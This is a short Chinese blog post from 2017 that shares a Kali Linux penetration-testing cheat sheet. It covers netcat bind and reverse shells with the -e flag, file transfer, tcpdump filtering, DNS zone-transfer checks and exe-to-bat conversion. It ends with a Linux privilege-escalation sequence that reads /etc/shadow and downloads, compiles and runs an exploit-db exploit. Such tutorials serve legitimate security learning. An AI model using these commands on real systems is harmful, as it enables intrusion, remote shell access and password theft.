kali滲透測試工具方法

信安之路發表於2017-10-29
 

kali作為一個滲透測試者最受歡迎的作業系統,整合了非常多的安全工具,讓滲透測試人員更方便的做一些滲透測試工作,本文來自國外某位大神的github,在這裡給大家做一個分享,具體內容如下:

Netcat


 

netcat是一個優秀的網路工具,在業界有“瑞士軍刀”的美譽,通常在Linux系統下都自帶了。

 

測試環境

Kali 192.168.2.10

Windows 192.168.2.12

 

聊天

Windows nc -nlvp 4444

Kali nc -nv 192.168.2.12 4444

 

正向shell

Windows nc -nlvp 4444 -e cmd.exe

Kali nc -nv 192.168.2.12 4444

 

反向shell

Windows nc -nlvp 4444

Kali nc -nv 192.168.2.12 4444 -e /bin/bash

 

檔案傳輸

Windows nc -nlvp 4444 > incoming.exe

Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe

Ncat


 

Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一個正向shell:

Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl

Linux ncat -nv 192.168.2.12 4444 --ssl

tcpdump


 

tcpdump是Linux下一個網路包擷取分析工具。它支援針對網路層、協議、主機、網路或埠的過濾,並提供and、or、not等邏輯語句來幫助你去掉無用的資訊。

 

讀取資料包檔案

tcpdump -r <capture.pcap>

 

指定源IP獲取資料包檔案中的資料

tcpdump -n src host 192.168.2.10 -r <capture.pcap>

 

指定目的IP獲取資料包檔案中的資料

tcpdump -n dst host 192.168.2.12 -r <capture.pcap>

 

指定埠獲取資料包檔案中的資料

tcpdump -n port 443 -r <capture.pcap>

 

讀取資料包檔案並且以16進位制顯示

tcpdump -nX -r <capture.pcap>

利用host獲取dns資訊


 

host是一個用來執行dns查詢的小工具。

 

列舉dns資訊

host -t <type> target.com

mx = mail server

ns = name server

 

測試dns域傳送

host -l target.com <DNS server>

 

###EXE轉bat


 

在某些特殊的情況下需要將exe轉為bat,便於上傳並執行,下面就是如何使用kali將exe轉為bat。

cp /usr/share/windows-binaries/nc.exe /root/

cp /usr/share/windows-binaries/exe2bat.exe /root/

upx -9 nc.exe

wine exe2bat.exe nc.exe nc.txt

Linux本地提權


 

在獲得一個webshell之後,一般許可權為apache許可權,想要進一步的滲透測試需要將自己的許可權提升到最高,下面是在Linux下提權使用命令。

ssh user@<target IP>

id # 顯示使用者和組的許可權

cat /etc/shadow # 儲存的使用者的密碼,只有root許可權可以檢視

cat /etc/issue # 檢視系統版本資訊

uname -a

 

如何下載並執行提權exp:

wget -O exploit.c http://www.exploit-db.com/download/18411

gcc -o exploit exploit.c # 編譯

./exploit # 執行

id # 檢視是否提權成功

cat /etc/shadow # 讀取使用者密碼

總結

這個文章其實有點不想發,但是又沒有好文章給大家分享,所以就湊合著給大家看看,畢竟不想浪費今天發文的機會,大家有好的文章不要藏著掖著,發給我有好禮相送呦。最後祝大家國慶節快樂,在玩的同時也別忘了學習呀!

 

相關文章